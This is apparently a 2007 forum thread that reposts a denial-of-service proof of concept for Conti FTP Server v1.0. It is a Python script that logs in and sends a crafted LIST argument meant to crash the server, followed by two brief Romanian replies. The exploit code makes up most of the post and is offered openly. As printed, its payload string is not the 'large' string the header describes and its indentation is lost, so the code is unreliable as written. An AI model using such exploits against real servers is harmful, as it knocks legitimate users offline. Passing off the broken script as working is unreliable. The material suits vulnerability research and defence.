Conti FTP Server v1.0 Denial of Service

kw3rln · June 30, 2007

http://www.securityfocus.com/archive/1/472346/30/0/threaded

#Conti FTP Server v1.0 Denial of Service
#author: 35c666
#contact: 
#Download:
[url]http://www.procesualitatea.ro/bestplay/Conti_FtpServer_Setup.exe[/url]
#Bug: Conti Ftp Server crashes when a large //A: string is sent,
denying legitimate users access to their accounts.
#greetz to all RST members at [url]http://rstzone.net[/url]

# usr/bin/python

import socket
import time

buff = "//A:"

user = "test"
password = "test"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
conn = s.connect(("172.16.112.129",21))
d = s.recv(1024)
print "Server <- " + d
time.sleep(2)

s.send('USER %s\r\n' % user)
print "Client -> USER " + user
d = s.recv(1024)
print "Server <- " + d
time.sleep(2)

s.send('PASS %s\r\n' % password)
print "Client -> PASS " + password
d = s.recv(1024)
print "Server <- " + d
time.sleep(2)

s.send('LIST %s\r\n' % buff)
print "Client -> LIST " + buff
d = s.recv(1024)
print d
time.sleep(2)

except:
print "- Nu m-am putut conecta."

--
Click for FHA loan, $0 lender fees, low rates & approvals nationwide
[url]http://tagline.hushmail.com/fc/Ioyw6h4dOJ5vAvidooorO3QwkYqsdtxW1lWMSsqYo[/url]
Y19IzyPIitWQU/

cine-i asta?

escalation666 · June 30, 2007

eu mah...

kw3rln · June 30, 2007

scuze n-am vazut postu de dinainte

Sign In

Conti FTP Server v1.0 Denial of Service

Recommended Posts

kw3rln

escalation666

kw3rln

Join the conversation

Browse

Activity

Pages